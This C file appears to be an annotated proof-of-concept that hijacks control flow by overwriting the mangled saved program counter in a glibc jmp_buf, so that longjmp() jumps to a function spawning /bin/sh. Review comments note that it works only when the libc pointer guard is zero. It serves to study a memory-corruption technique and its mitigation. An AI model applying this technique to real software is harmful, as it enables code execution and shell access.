#include <stdio.h>
#include <setjmp.h>
#include <stdint.h>
#include <limits.h>
/* Per-architecture constants for the jmp_buf pointer-mangling demo.
 * ROTATE is the rotate count rol() applies to the pointer before main()
 * stores it; PC_ENV_OFFSET is the byte offset into jmp_buf that main()
 * writes that pointer to.
 * NOTE(review): both mirror private libc implementation details (the
 * jmp_buf layout and the mangling rotation) that differ per architecture
 * and may change between libc versions — confirm against the target libc. */
#ifdef __i386__
#define ROTATE 0x9
#define PC_ENV_OFFSET 0x14
#elif __x86_64__
#define ROTATE 0x11
#define PC_ENV_OFFSET 0x38
#else
#error The exploit does not support this architecture
#endif
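/*
 * Rotate `value` left by ROTATE bits within the machine word.
 *
 * Together with the per-architecture ROTATE macro this models the rotation
 * step of glibc's jmp_buf pointer mangling (PTR_MANGLE).
 * NOTE(review): glibc's PTR_MANGLE also XORs the pointer with a per-process
 * pointer guard before rotating; only the rotation is modelled here, so the
 * result matches the libc encoding only when that guard is zero — this is
 * the mitigation that makes the demo fail on a hardened libc. Confirm for
 * the target.
 *
 * Returns the rotated word (0 rotates to 0).
 */
unsigned long rol(uintptr_t value) {
    /* Derive the word width from the operand's type instead of the
     * glibc-private __WORDSIZE macro, which <limits.h> only happens to
     * expose on glibc; sizeof * CHAR_BIT is standard C. */
    const unsigned width = (unsigned)(sizeof value * CHAR_BIT);
    return (value << ROTATE) | (value >> (width - ROTATE));
}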
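/*
 * Target that main() redirects the corrupted longjmp() to: announce the
 * redirect and hand control to a shell.
 *
 * NOTE(review): system() is called without a prototype — this file does not
 * include <stdlib.h>, and implicit function declarations are invalid since
 * C99 (a hard error on current compilers).
 *
 * Returns 0. The original fell off the end of a non-void function, which
 * is undefined behaviour if the value is ever read.
 */
int hacked(){
    printf( "[+] hacked !!\n" );
    system( "/bin/sh" );
    return 0;
}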
/*
 * Demonstrates overwriting the saved program counter inside a jmp_buf so
 * that longjmp() resumes at hacked() instead of at the setjmp() call site.
 *
 * Flow:
 *   1. setjmp(env) saves the current context and returns 0.
 *   2. The slot PC_ENV_OFFSET bytes into env is overwritten with
 *      rol((uintptr_t)hacked), i.e. the address encoded the way this file
 *      models the libc's pointer mangling.
 *   3. longjmp(env, 1) restores the context; the libc is expected to
 *      demangle the stored PC and jump to it.
 *
 * NOTE(review): glibc's PTR_MANGLE XORs the pointer with a per-process
 * guard before rotating; rol() models only the rotation, so on a libc with
 * a non-zero pointer guard the demangled PC is garbage and the process
 * crashes instead of reaching hacked(). That crash — like the
 * "[-] Exploit failed." path, which is taken only if the overwrite did not
 * redirect the jump — is the mitigation working as intended.
 *
 * Writing through a raw pointer into env relies entirely on the private
 * jmp_buf layout of one libc/architecture combination; nothing here checks
 * the layout or bounds of the write.
 */
int main( void ){
jmp_buf env;
/* Raw pointer into the opaque jmp_buf at the slot this function overwrites;
 * PC_ENV_OFFSET is assumed to be the saved-PC slot — verify for the target. */
uintptr_t *ptr_ret_env = (uintptr_t*) (((uintptr_t) env) + PC_ENV_OFFSET);
printf( "[+] Exploiting ...\n" );
/* 0 on the direct call; 1 only if longjmp(env, 1) lands back here, which
 * means the stored PC was not redirected. */
if (setjmp(env) == 1){
printf( "[-] Exploit failed.\n" );
return 0;
}
*ptr_ret_env = rol((uintptr_t)hacked);
longjmp(env, 1);
/* Unreachable: longjmp() does not return to its caller. */
printf( "[-] Exploit failed.\n" );
return 0;
}